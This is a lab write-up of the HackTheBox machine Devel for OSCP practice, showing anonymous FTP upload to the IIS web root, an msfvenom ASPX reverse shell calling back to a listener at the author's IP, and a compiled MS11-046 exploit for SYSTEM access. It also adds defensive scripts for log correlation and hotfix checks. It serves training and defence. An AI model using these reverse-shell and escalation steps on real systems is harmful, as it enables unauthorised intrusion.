Hack The Box — Devel — without Metasploit (TJNull’s list for OSCP)

Daniyal Ahmed
5 min read · Jun 5, 2023

[image: devel.htb]

This is my 25th write-up, for Devel, a machine from TJNull's list of HackTheBox machines for OSCP practice. The full list can be found here.

In a typical penetration test or CTF there are three major phases:

  1. Enumeration and Scanning (Information Gathering).
  2. Initial Foothold.
  3. Privilege Escalation.

Let’s get started with the box!

Enumeration

First, let's run an nmap scan on the default ports to see which services are running on the target.

nmap -sC -sV -O -oA nmap/initial devel.htb

  • -oA saves the output in all three formats (here under the nmap directory, with the basename initial)
  • -sC runs the default scripts
  • -sV enumerates service versions
  • -O attempts OS detection

[image: nmap initial scan output]

So, we have FTP running on port 21 and HTTP running on port 80. Anonymous login is allowed on the target's FTP server. Nmap also lists the contents of the FTP root, which shows iisstart.htm, welcome.png and a directory named aspnet_client.

Let's move on to the HTTP server and see what it is serving.

We get the IIS7 default page. If we look at the source of the web page, we can see:

[image: source of the HTTP home page]

The image welcome.png is included without a full path, which means it sits in the same directory the web page is served from. We also saw welcome.png in the FTP listing, so the FTP root and the web root are very likely the same directory. Let's log in to FTP, check whether we have write access by putting a file there, and see whether that file is then reachable through the web server.

I'll create a test file, upload it over FTP, then try to access it from the web server.

echo "Hello DaemonExala" > test.txt
ftp devel.htb

Now, let's see if I can access it over HTTP.

And I can. Let's generate an ASPX shell and upload it the same way; that should give us a reverse shell.

Initial Foothold

Let’s generate an ASPX reverse shell using MSFVENOM.

msfvenom -p windows/shell_reverse_tcp LHOST="10.10.16.32" LPORT=4242 -f aspx > shell.aspx

Let's upload it over FTP.

Then start a listener on the port we used when generating the reverse shell.

rlwrap nc -lvnp 4242

Let’s navigate to http://devel.htb/shell.aspx to get a reverse shell.

And we got a reverse shell.
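The weakness exploited above is a configuration one: anonymous FTP with write access whose root is also the IIS web root, so anything uploaded becomes a URL and, for script extensions, gets executed by IIS. The usual fixes are to keep the FTP root and the web root separate (or deny write) and to make sure upload locations have no script handlers mapped. For detection, the pattern is visible in the server's own logs: an FTP STOR of a path followed shortly by an HTTP GET of the same path. The script below is an added example, not code from the original write-up; it parses IIS-style W3C logs by reading the #Fields directive and correlates the two. The log lines are constructed samples (the server IP 10.10.10.5, the timestamps and the field subset are assumptions; only the client IP 10.10.16.32 and the file names come from the write-up).

```python
"""Correlate IIS FTP uploads with subsequent HTTP requests for the same path.

Added example (not from the original write-up). It assumes the FTP site and
the web site share a root directory, as on Devel, so a path stored via FTP is
the same path served over HTTP. Log lines are constructed samples in W3C
extended log format with a reduced set of fields.
"""
from datetime import datetime, timedelta

# Extensions IIS hands to a script engine, or native executables.
# Constructed list for the example; tune it to the server's handler mappings.
EXECUTABLE_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx", ".exe", ".dll"}

# Constructed FTP log (IIS FTP logs record the command as cs-method).
FTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2023-06-05 10:01:12 10.10.16.32 USER anonymous 331
2023-06-05 10:01:12 10.10.16.32 PASS *** 230
2023-06-05 10:01:40 10.10.16.32 STOR /test.txt 226
2023-06-05 10:03:05 10.10.16.32 STOR /shell.aspx 226
"""

# Constructed web log; 10.10.10.5 is a placeholder server address.
WEB_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2023-06-05 10:02:10 10.10.10.5 GET /test.txt - 80 10.10.16.32 200
2023-06-05 10:03:30 10.10.10.5 GET /shell.aspx - 80 10.10.16.32 200
2023-06-05 10:04:00 10.10.10.5 GET /welcome.png - 80 10.10.16.32 200
"""


def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the names in #Fields."""
    fields = None
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue  # other directives (#Software, #Date, ...)
        if fields is None:
            raise ValueError("data line before #Fields directive")
        values = line.split()
        if len(values) != len(fields):
            continue  # skip malformed lines rather than misalign columns
        rec = dict(zip(fields, values))
        rec["timestamp"] = datetime.strptime(
            rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        records.append(rec)
    return records


def find_upload_then_execute(ftp_text, web_text, window=timedelta(hours=1)):
    """Return alerts for files stored via FTP and then requested over HTTP.

    Each alert records the path, uploading and requesting client IPs, both
    timestamps, and whether the extension is one IIS would execute.
    """
    uploads = [r for r in parse_w3c(ftp_text)
               if r["cs-method"] == "STOR" and r["sc-status"].startswith("2")]
    requests = parse_w3c(web_text)
    alerts = []
    for up in uploads:
        path = up["cs-uri-stem"]
        for req in requests:
            if req["cs-uri-stem"].lower() != path.lower():
                continue
            delta = req["timestamp"] - up["timestamp"]
            if timedelta(0) <= delta <= window:
                ext = path[path.rfind("."):].lower() if "." in path else ""
                alerts.append({
                    "path": path,
                    "uploaded_by": up["c-ip"],
                    "uploaded_at": up["timestamp"].isoformat(),
                    "requested_by": req["c-ip"],
                    "requested_at": req["timestamp"].isoformat(),
                    "executable": ext in EXECUTABLE_EXTENSIONS,
                })
    return alerts


if __name__ == "__main__":
    for alert in find_upload_then_execute(FTP_LOG, WEB_LOG):
        level = "HIGH" if alert["executable"] else "info"
        print(f"[{level}] {alert['path']} stored by {alert['uploaded_by']} "
              f"at {alert['uploaded_at']}, fetched by {alert['requested_by']} "
              f"at {alert['requested_at']}")
```

Against the sample logs this raises an informational alert for test.txt and a high one for shell.aspx, while welcome.png, which was never uploaded, is ignored. Reading the #Fields line instead of hard-coding column positions is what lets the same parser handle both the FTP and the web log despite their different layouts.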

Privilege Escalation

Let's see which user our shell is running as.

whoami

Right now we are the default IIS user, which will have very limited rights on the machine. Let's enumerate from inside to get a better picture. First, systeminfo:

systeminfo

We can see that it's Windows 7 Enterprise, build 6.1.7600.

Let's see whether any privilege escalation exploits exist for this version. A quick Google search turned up this one:
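Whether an old local privilege escalation still works on a host comes down to the build and the hotfixes it reports, which is exactly what systeminfo prints. The following is an added example, not code from the original write-up: it parses a captured systeminfo dump into the OS name, build number and installed KB set, and diffs that set against a patch baseline. The dump is constructed in systeminfo's real layout, and the KB numbers in it and in REQUIRED_HOTFIXES are placeholders, since the baseline for a given build is something the reader supplies, not something this page provides.

```python
"""Parse a captured `systeminfo` dump and compare its hotfixes to a baseline.

Added example, not code from the original write-up. SAMPLE_SYSTEMINFO is a
constructed dump; the KB numbers below are placeholders, not real hotfix ids.
"""
import re

SAMPLE_SYSTEMINFO = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
System Type:               X86-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB0000001
                           [02]: KB0000002
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""

# Placeholder baseline: KBs your patch policy requires on this build.
REQUIRED_HOTFIXES = {"KB0000001", "KB0000002", "KB0000003"}

# "Key:   value" lines; the key runs up to the first colon.
_KEY_RE = re.compile(r"^([A-Za-z][^:]*):\s*(.*)$")
_KB_RE = re.compile(r"\bKB\d+\b")


def parse_systeminfo(text):
    """Return 'os_name', 'os_version', 'build' (int) and 'hotfixes' (set).

    systeminfo prints one "Key: value" line per item, with multi-value
    sections such as Hotfix(s) continued on indented lines. Indented lines
    are attached to the most recent key so the KB numbers can be collected.
    """
    sections = {}
    current = None
    for line in text.splitlines():
        if not line.strip():
            continue
        m = _KEY_RE.match(line) if not line[0].isspace() else None
        if m:
            current = m.group(1).strip()
            sections[current] = [m.group(2).strip()]
        elif current is not None:
            sections[current].append(line.strip())
    os_version = sections.get("OS Version", [""])[0]
    build_match = re.search(r"Build (\d+)", os_version)
    return {
        "os_name": sections.get("OS Name", [""])[0],
        "os_version": os_version,
        "build": int(build_match.group(1)) if build_match else None,
        "hotfixes": set(_KB_RE.findall(" ".join(sections.get("Hotfix(s)", [])))),
    }


def missing_hotfixes(info, required=REQUIRED_HOTFIXES):
    """Return the required KBs that are not installed, sorted for stable output."""
    return sorted(required - info["hotfixes"])


if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(f"{info['os_name']} build {info['build']}: "
          f"{len(info['hotfixes'])} hotfix(es) installed")
    for kb in missing_hotfixes(info):
        print(f"missing: {kb}")
```

The same parser works on a dump pasted from a reverse shell or on output collected by an inventory agent; the point is that the build number plus the KB set is the evidence a defender needs to decide whether a kernel patch level like the one on Devel is still exposed.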

https://github.com/abatchy17/WindowsExploits/blob/master/MS11-046/40564.c

The comments at the top of the code also explain how to compile it.

I saved the code as priv.c, so I'm substituting that file name below.

i686-w64-mingw32-gcc priv.c -o priv.exe -lws2_32

It compiled without errors. Let's upload the exe over FTP, since we have write permission there.

Always switch FTP to binary mode before transferring an executable, or the file will be corrupted in transit.

Now, let’s navigate to the FTP directory from our reverse shell and run it.

We have the inetpub directory in the root of the C drive; it's the default directory when you set up IIS. Since we know the web server and FTP server share the same directory, our uploaded exploit should be in there.

Inside inetpub we have wwwroot, again the default directory.

Inside wwwroot we can see our uploaded binary exploit.

Let’s run it.

priv.exe

And we got an NT AUTHORITY\SYSTEM (root) shell.

EZ :)
